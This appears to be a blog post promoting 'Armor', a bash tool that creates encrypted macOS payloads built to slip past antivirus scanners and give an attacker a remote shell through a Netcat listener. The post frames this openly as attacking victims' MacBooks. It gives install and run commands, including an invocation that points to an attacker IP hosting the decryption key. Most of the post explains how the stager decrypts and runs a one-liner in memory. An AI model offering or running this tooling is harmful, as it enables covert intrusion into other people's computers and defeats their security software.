Armor – Tool For Exploit MacOS And Create Encrypted Payloads For Bypass Antivirus Scanners

How To Exploit MacOS

Armor is very cool tool, This tool is very simple bash script that can create encrypted payloads for bypass antivirus scanner and exploit macOS. This tool will create an encrypted payload and also start the listener with Netcat, and if the victim open the encrypted payload in his Macbook for example then attacker has remote access to victim MacBook, If you asking ” how to exploit macOS ? “, this tool is the answer, it is cool but dangerous as well.

Armor

Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. Below is an example gif of Armor being used with a simple Netcat payload.

Ncat is used to host the decryption key on the attacker’s server. When the stager is executed in the target MacBook (not shown in the gif), the bash one-liner is decrypted and executed without writing any data to the harddrive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.

Armor Tool for exploit macOS and create encrypted payloads for bypass antivirus scanners

Admittedly, encrypting most macOS-specific payloads is overkill. This specific bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an example. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks

Installation

Armor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL isn’t found in your system, This tool will attempt to install it. The function for this can be found in the armor.sh file. Ncat is also a dependency and can be installed in Kali using 

apt-get update && apt-get install nmap

Armor can be cloned and executed using the below commands.

git clone https://github.com/tokyoneon/Armor

cd Armor/

chmod +x armor.sh

./armor.sh /path/to/payload.txt 1.2.3.4 443


The 1.2.3.4 address is the attacker’s IP address where the decryption key will be hosted. This can be a local IP address or VPS. The port number (443), is arbitrary and can be changed as needed.

Questions and concerns:


You May Also Like

Leave a Reply

Your email address will not be published. Required fields are marked *

16 − 6 =